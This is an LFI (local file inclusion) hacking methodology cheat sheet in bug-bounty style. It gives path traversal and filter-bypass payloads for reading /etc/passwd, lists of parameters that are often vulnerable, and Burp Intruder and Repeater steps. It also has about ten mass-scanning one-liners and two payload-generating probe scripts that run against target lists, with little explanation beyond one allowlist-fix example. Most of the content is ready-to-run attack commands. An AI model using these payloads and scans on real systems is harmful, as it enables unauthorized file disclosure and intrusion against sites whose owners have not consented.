🧨My LFI Methodology
TIP: file:///etc/passwd : Not authorized
file://\/\/etc/passwd : Works
---------------------------------------------------------------
TIP: file:///etc/passwd blacklisted?
Use "view-source:file:///etc/passwd"; the "view-source:" prefix is often forgotten by developers when they write blacklists.
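Both tips above work for the same reason: the filter compares the raw string against the one prefix the developer thought of. The script below is an added example (not from the original page) that reproduces such a blacklist next to the check that actually holds: parse the scheme first, then allow only http/https. The function names and the sample URLs are assumptions for illustration.

```shell
# Naive filter: reject only the literal "file:///" prefix.
# Returns 0 (allowed) or 1 (blocked), like an app that tests a string prefix.
deny_by_blacklist() {
    case "$1" in
        file:///*) return 1 ;;   # the one spelling that is blocked
        *)         return 0 ;;   # everything else passes, bypasses included
    esac
}

# Allowlist: lower-case the input, take everything before the first ':' as the
# scheme, and accept http/https only. file, view-source, gopher, or a value with
# no scheme at all are all rejected, whatever follows the colon.
allow_by_scheme() {
    scheme=$(printf '%s' "$1" | cut -d: -f1 | tr 'A-Z' 'a-z')
    case "$scheme" in
        http|https) return 0 ;;
        *)          return 1 ;;
    esac
}

# Run checker $1 against URL $2 and print a readable verdict.
verdict() {
    if "$1" "$2"; then echo "allowed"; else echo "blocked"; fi
}

# Side-by-side comparison of the two checks on the payloads from the tips
# plus one legitimate URL (constructed sample inputs).
demo() {
    for u in 'file:///etc/passwd' 'file://\/\/etc/passwd' \
             'view-source:file:///etc/passwd' 'https://example.com/'; do
        printf '%-34s blacklist=%-7s allowlist=%s\n' "$u" \
            "$(verdict deny_by_blacklist "$u")" "$(verdict allow_by_scheme "$u")"
    done
}

demo
```

Only the first URL is caught by the blacklist; the allowlist blocks all three file-reading variants and still lets the https URL through, which is the behaviour to ask for in a fix.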
---------------------------------------------------------------
File Download to Check LFI
Send the file download request to Burp Intruder
Select the parameter value as the payload position
Select the Burp payload list: Fuzzing - Path Traversal (Single File)
Configure the file name with a Payload Processing -> Match/Replace rule:
Match regex: \{file\}
Replace with: etc/passwd
---------------------------------------------------------------
Check LFI Methods
Send the file download request to Burp Repeater
Select the parameter value and try the payloads one by one
../../../etc/passwd <-- simple check
/etc/passwd <-- absolute path, for when traversal sequences are blocked
....//....//....//etc/passwd <-- for when "../" is stripped non-recursively (a single pass)
/var/www/images/../../../etc/passwd <-- for when the path must start with an expected base directory
../../../etc/passwd%00.png <-- for when a file extension is appended (null-byte truncation; only works on old PHP versions)
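The one-liners further down fire a single payload per URL and grep for "root:x". The script below is an added example, not code from the original page: it generates the variants listed above for a chosen file and depth (plus single URL-encoded forms, which the list does not include), reproduces the one-pass "../" strip to show why "....//" survives it, and classifies a response body as a real /etc/passwd instead of matching any page that happens to echo the string "root:x" back. The function names, the depth of 3, the FUZZ marker convention and the /var/www/images base directory are assumptions for illustration.

```shell
# Reproduce the weak filter: one pass of removing "../".
# "....//" loses its middle "../" and collapses to "../", so the traversal
# is reassembled after the filter ran.
strip_traversal_once() {
    printf '%s\n' "$1" | sed 's#\.\./##g'
}

# Emit one candidate per line for file $1 (no leading slash) at depth $2.
lfi_payloads() {
    file=$1; depth=${2:-3}
    up=''; stripped=''; enc=''; i=0
    while [ "$i" -lt "$depth" ]; do
        up="${up}../"; stripped="${stripped}....//"; enc="${enc}%2e%2e%2f"
        i=$((i+1))
    done
    printf '%s\n' \
        "${up}${file}" \
        "/${file}" \
        "${stripped}${file}" \
        "/var/www/images/${up}${file}" \
        "${up}${file}%00.png" \
        "${enc}${file}" \
        "${enc}${file}%00"
}

# Read a response body on stdin; succeed only if it contains a root entry in
# the name:pw:uid:gid form. Grepping for the bare "root:x" also fires on error
# pages that echo the payload or on pages that merely talk about /etc/passwd.
looks_like_passwd() {
    grep -Eq 'root:[^:]*:0:0:'
}

# Fire every candidate at a URL that contains the marker FUZZ (same convention
# as "qsreplace FUZZ" and ffuf) and report the ones whose body is a passwd file.
# This is the only function that touches the network.
lfi_probe() {
    url=$1; file=${2:-etc/passwd}
    case $url in *FUZZ*) ;; *) echo "usage: lfi_probe 'http://host/page.php?file=FUZZ' [file]" >&2; return 2 ;; esac
    lfi_payloads "$file" | while IFS= read -r p; do
        if curl -s --path-as-is -- "${url%%FUZZ*}${p}${url#*FUZZ}" | looks_like_passwd; then
            echo "VULN: $url <- $p"
        fi
    done
}

# Offline demonstration of the filter bypass (constructed input).
echo "filter input : ....//....//....//etc/passwd"
echo "filter output: $(strip_traversal_once '....//....//....//etc/passwd')"
# Usage against a target (not run here):
#   lfi_probe 'http://testphp.vulnweb.com/showimage.php?file=FUZZ'
```

Swap the `looks_like_passwd` pattern for whatever marker fits the file you request (for example `\[boot loader\]` for a Windows boot.ini) and the rest of the script stays the same.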
-------------------------------------------------------------
Top 25 parameters
Here is a list of 25 parameters that are commonly vulnerable to local file inclusion (LFI)
?cat={payload} ?dir={payload} ?action={payload} ?board={payload} ?date={payload} ?detail={payload} ?file={payload} ?download={payload} ?path={payload} ?folder={payload} ?prefix={payload} ?include={payload} ?page={payload} ?inc={payload} ?locate={payload} ?show={payload} ?doc={payload} ?site={payload} ?type={payload} ?view={payload} ?content={payload} ?document={payload} ?layout={payload} ?mod={payload} ?conf={payload}
---------------------------------------------------------------
Local file inclusion at filemanager.php Endpoint
Parameter: path=
Payload: //....//....//....//....//....//....//....//....//....//etc/passwd
----------------------------------------------------------------
Automate this with a one-liner
cat roots | assetfinder -subs-only | waybackurls | qsreplace "//....//....//....//....//....//....//....//....//....//etc/passwd" | httpx -nc -silent -mr "root:x" -t 5
----------------------------------------------------------------
(1) One-Liner LFI Finding
gau http://testphp.vulnweb.com | gf lfi | qsreplace "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'
----------------------------------------------------------------
(2) One-Liner LFI Finding
echo http://testphp.vulnweb.com | gau | gf lfi | bhedak ".%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./etc/passwd" | httpx -silent -ms "root:x:"
----------------------------------------------------------------
(3) One-Liner LFI Finding
waybackurls http://testphp.vulnweb.com | gf lfi | qsreplace "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'
----------------------------------------------------------------
(4) One-Liner LFI Finding
cat targets.txt | while read -r host; do curl --silent --path-as-is --insecure "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd" | grep -q "root:x" && printf '%s \033[0;31mVulnerable\033[0m\n' "$host"; done
----------------------------------------------------------------
(5) One-Liner LFI Finding
findomain -t testphp.vulnweb.com -q | waybackurls | gf lfi | qsreplace FUZZ | while read -r url; do ffuf -u "$url" -mr "root:x" -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-etc-files-of-all-linux-packages.txt; done
----------------------------------------------------------------
(6) One-Liner NGINX LFI Finding
httpx -l file.txt -path "///////../../../../../../etc/passwd" -status-code -mc 200 -ms 'root:'
----------------------------------------------------------------
(7) One-Liner LFI Finding
gau http://testphp.vulnweb.com | gf lfi | qsreplace "/etc/passwd" | httpx -t 250 -mr "root:x"
----------------------------------------------------------------
(8) One-Liner LFI Finding
cat targets.txt | httpx -nc -t 250 -p 80,443,8080,8443,4443,8888 -path "///////../../../etc/passwd" -mr "root:x" | anew lfi-httpx.txt
----------------------------------------------------------------
(9) One-Liner LFI Finding
cat targets.txt | httpx -silent -threads 500 | gau | gf lfi | qsreplace "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'
----------------------------------------------------------------
(10) One-Liner LFI Finding
findomain -t vulnweb.com -q | waybackurls | gf lfi | qsreplace FUZZ | while read -r url; do ffuf -u "$url" -mr "root:x" -w ~/wordlist/LFI.txt; done
----------------------------------------------------------------
Parameters to attack
(dest=, redirect=, uri=, url=, path=, continue=, window=, next=, data=, reference=, site=, html=, val=, validate=, domain=, callback=, return=, page=, view=, dir=, show=, file=, document=, root=, folder=, pg=, style=, pdf=, feed=, port=, to=, navigation=, open=, result=)
----------------------------------------------------------------
How to Find LFI Manually Using Burp Hackbar
Add the target to Scope, then crawl pages and endpoints with parameters like page=, path=, file=
Open the Burp search tab, click the Search button and search request bodies for LFI endpoints like file=
Send the request to Repeater and add an LFI payload with Hackbar, e.g. GET /showimage.php?file=../../etc/passwd
Check the response for /etc/passwd content, then BOOM
----------------------------------------------------------------
How to Find LFI Using Burp Intruder | LFI_Payloads.txt
Add the target to Scope, then crawl pages and endpoints with parameters like page=, path=, file=
Open the Burp search tab, click the Search button and search request bodies for LFI endpoints like file=
Send the request to Intruder and set the payload position on the parameter value, e.g. GET /showimage.php?file=../../etc/passwd
Load LFI_Payloads.txt in the Payloads section
In the Options tab add root:x:0:0:root: under Grep - Match, then start the attack
Look for hits in the root:x:0:0:root: column of the responses, then BOOM
----------------------------------------------------------------
How to Find LFI Using wayback | gf | Burp Hackbar
waybackurls Target.com | gf lfi >> lfi.txt
cat lfi.txt and search the URLs for LFI endpoints like page=, path=, file=
Open the URL in the browser, send the request to Burp Repeater and add an LFI payload with Hackbar, e.g. GET /showimage.php?file=../../etc/passwd
Check the response for /etc/passwd content, then BOOM
----------------------------------------------------------------
How to Find LFI Using wayback | gf | Burp Intruder | LFI_Payloads.txt
waybackurls Target.com | gf lfi >> lfi.txt
cat lfi.txt and search the URLs for LFI endpoints like page=, path=, file=
Open the URL in the browser, send the request to Burp Intruder and set the payload position on the parameter value, e.g. GET /showimage.php?file=../../etc/passwd
Load LFI_Payloads.txt in the Payloads section
In the Options tab add root:x:0:0:root: under Grep - Match, then start the attack
Look for hits in the root:x:0:0:root: column of the responses, then BOOM
----------------------------------------------------------------